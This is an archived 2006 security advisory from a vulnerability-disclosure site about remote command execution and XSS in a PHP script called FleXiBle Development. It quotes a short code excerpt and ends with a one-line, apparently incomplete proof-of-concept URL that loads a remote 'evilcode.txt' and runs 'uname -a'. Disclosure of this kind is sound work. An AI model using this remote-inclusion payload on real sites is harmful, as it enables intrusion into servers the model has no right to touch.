Computer Security

Security Advisory: FleXiBle Development Script Remote Command Exucetion And XSS Attacking
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking

  SiteMan <= All version SQL injection in admin_login.asp

  linksubmit  <= All version Html Tag Injector in index.php

  DbbS<=2.0-alpha SQL injection

From:botan_(at)_linuxmail.org <botan_(at)_linuxmail.org>
Date:02.04.2006
Subject:FleXiBle Development Script Remote Command Exucetion And XSS Attacking

Description :

/* =================================================
File created by Andries Bruinsma
(c) FleXiBle Development (FXB)
Web: http://www.ahbruinsma.nl
Email: renegade@clanflex.com
===================================================
File: main.php
Version: 3.0
Date started: 10th May, 2004
Last modified : 24th January, 2006
Last Update: New layout

=================================================

Vulnerable

ob_start(ob_gzhandler);
//Defining some functions and including them
require('php/messages.php');
//require base-file
//require_once('php/base.php');
include_once "baseconfig.inc.php";


http://www.site.com/[path]/evilcode.txt?&cmd=uname -a
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru